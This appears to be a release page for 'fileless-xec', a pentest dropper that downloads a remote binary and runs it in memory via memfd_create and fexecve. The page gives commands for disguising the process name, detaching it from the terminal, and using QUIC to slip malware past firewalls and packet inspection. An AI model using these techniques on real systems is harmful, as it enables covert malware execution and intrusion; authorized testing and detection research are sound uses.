fileless-xec v3.2.1 releases: A stealth dropper

stealth dropper

fileless-xec – A stealth dropper

Pentest use: fileless-xec is used on the target machine to execute a binary file on an attacker-controlled machine

Short story

fileless-xec enable us to execute a remote binary on a local machine in one step without dropping them on disk

  • simple usage fileless-xec <binary_url>
  • execute binary with specified program name: fileless-xec -n /usr/sbin/sshd <binary_raw_url>
  • retrieve remote binary using http3 protocol and execute it: fileless-xec -http3 <binary_raw_url>
  • detach program execution from tty: setsid fileless-xec […]

Explanation

We want to execute writeNsleep binary locate on a remote machine, locally.

We first start a python http server on the remote. Locally we use fileless-xec and impersonate the /usr/sbin/sshd name for the execution of the binary writeNsleep (for stealthiness & fun)

Stealthiness story

  • The binary file is not mapped into the host file system
  • The execution program name could be customizable
  • Bypass 3rd generation firewall could be done with http3 support

memfd_create

The remote binary file is stored locally using memfd_create syscall, which stores it within a memory disk which is not mapped into the file system (ie you can’t find it using ls).

fexecve

Then we execute it using fexecve syscall (as it is currently not provided by syscall golang library we implement it).

With fexecve , we could but we reference the program to run using a file descriptor, instead of the full path.

HTTP3/QUIC

Enable it with -Q/http3 flag.
You can set up a light web rootfs server supporting http3 by running go run ./test/http3/light-server.go -p LISTENING PORT (This is http3 equivalent of python3 -m http.server )
use test/http3/genkey.sh to generate cert and key.

QUIC UDP aka http3 is a new generation Internet protocol that speeds online web applications that are susceptible to delay, such as searching, video streaming, etc., by reducing the round-trip time (RTT) needed to connect to a server.

Because QUIC uses proprietary encryption equivalent to TLS (this will change in the future with a standardized version), 3rd generation firewalls that provide application control and visibility encounter difficulties to control and monitor QUIC traffic.

If you actually use fileless-xec as a dropper (Only for testing purposes or with the authorization), you likely want to execute some type of malwares or another file that could be dropped by packet analysis. Hence, Quic enables you could bypass packet analysis and GET malware.

Also, in the case of firewall is only used for allowing/blocking traffic it could happen that firewall rules forget the udp protocol making your requests go under the radars

Another skill for stealthiness

Although not present on the memory disk, the running program can still be detected using ps command for example.

  1. Cover the tracks with a fake program name

fileless-xec –name <fake_name> <binary_raw_url> by default the name is [kworker/u:0]

  1. Detach from tty to map behaviour of daemon process

setsid fileless-xec <binary_raw_url>. WIP call setsid from code

Caveats

You could still be detected with:

$ lsof | grep memfd

Changelog v3.2.1

  • Add --setsid flag to detach the program from the tty

Download

Copyright (c) 2021 Ariary